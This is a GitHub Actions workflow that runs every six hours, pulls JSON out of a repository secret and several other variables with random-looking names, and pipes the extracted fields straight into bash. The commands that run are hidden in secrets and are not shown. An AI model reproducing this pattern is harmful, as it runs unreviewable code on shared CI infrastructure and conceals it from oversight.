name: zhaliangyy
on:
  workflow_dispatch:
  schedule:
    - cron: '40 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhaliangyy
        env:
          dgs1: ${{ secrets.dgs1 }}
        run: |
          echo $dgs1 | jq -r .kpzmg6717 | /bin/bash
          echo $mb5110 | jq -r .ev9702 | /bin/bash
          echo $f94 | jq -r .xh45 | /bin/bash
          echo $wts3846 | jq -r .ve34029 | /bin/bash
          echo $mrn971 | jq -r .kb33454 | /bin/bash
          echo $qxsz0 | jq -r .vnfrz38 | /bin/bash
          echo $u03271 | jq -r .g432 | /bin/bash
          echo $hdlxt3762 | jq -r .zy34318 | /bin/bash
          echo $vcpvn64616 | jq -r .amdc6 | /bin/bash
          echo $oe803 | jq -r .t7 | /bin/bash
          echo $msmi801 | jq -r .azxsl824 | /bin/bash

